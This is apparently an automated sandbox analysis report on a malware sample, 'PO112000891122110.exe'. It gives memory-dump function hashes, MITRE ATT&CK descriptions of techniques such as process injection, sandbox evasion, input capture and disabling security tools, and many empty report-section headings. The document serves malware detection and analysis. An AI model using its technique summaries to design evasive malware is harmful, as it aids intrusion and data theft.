Uniqueness Score: -1.00%

Function 1DC9D01C, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.487381168.000000001DC9D000.00000040.00000001.sdmp, Offset: 1DC9D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dbb436fec63277271b7bec32a7ceb5e72afd797df8e1529dcdfb24d1a8a1c659
Instruction ID: a4a00d159490ba4e16c59c4644532436df2db820ec2adc863c013bce79849e5f
Opcode Fuzzy Hash: dbb436fec63277271b7bec32a7ceb5e72afd797df8e1529dcdfb24d1a8a1c659
Instruction Fuzzy Hash: E92104B1504388DFDB09CF28D8C0B16BB61FB84314F24CA69E9495B246C33BD847CB62

Uniqueness

Uniqueness Score: -1.00%

Function 1DC9D005, Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.487381168.000000001DC9D000.00000040.00000001.sdmp, Offset: 1DC9D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4871ef20bf20cc958afd98a6909cbfa7bf3de846567ee652247093fe7c40c027
Instruction ID: ce4a775169975feca02f1460124a18b4fd26252a5c3b6ab7353b1133417721b7
Opcode Fuzzy Hash: 4871ef20bf20cc958afd98a6909cbfa7bf3de846567ee652247093fe7c40c027
Instruction Fuzzy Hash: 8B21A1754083849FDB06CF24D990B12BFB1FB46314F24C5EAD8498B297C33AD81ACB62

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 013A4EF8, Relevance: .2, Instructions: 197COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.482428270.00000000013A1000.00000040.00000001.sdmp, Offset: 013A1000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoadMemoryProtectVirtual
String ID:
API String ID: 3389902171-0
Opcode ID: 489ab947c7626e94e44cf1e2c84d191c566566c6e8c4fc443cb4d6423aadbd76
Instruction ID: d232709ee2c520f2801701c4078ce2fcb984d284ac634b37b06f35830d93414b
Opcode Fuzzy Hash: 489ab947c7626e94e44cf1e2c84d191c566566c6e8c4fc443cb4d6423aadbd76
Instruction Fuzzy Hash: 727185719443428FDF25CF2CC4D4729BBA1EF56228F89C299D5A68F2D7C3749442C722

Uniqueness

Uniqueness Score: -1.00%

Function 013A4880, Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.482428270.00000000013A1000.00000040.00000001.sdmp, Offset: 013A1000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d32d49ec8876913560559284a408bb007bcd2fc5b8b36ff0829d753b6f0a89b1
Instruction ID: e5a6b8cf78d8ba05277f5d37c9e23980d901f29929d558463ab091ae65e5935d
Opcode Fuzzy Hash: d32d49ec8876913560559284a408bb007bcd2fc5b8b36ff0829d753b6f0a89b1
Instruction Fuzzy Hash: E6F06D753002408FC715CB58C1C4E2977A8FB88318FA988B4E502CB666D3A1EC50CA21

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report PO112000891122110.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Memory Dumps

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTPS Packets

Code Manipulations

Statistics

CPU Usage

Memory Usage

Function 0040BFFA, Relevance: 239.6, APIs: 129, Strings: 7, Instructions: 1630
COMMON

Function 0040EAF8, Relevance: 33.3, APIs: 15, Strings: 4, Instructions: 95
COMMON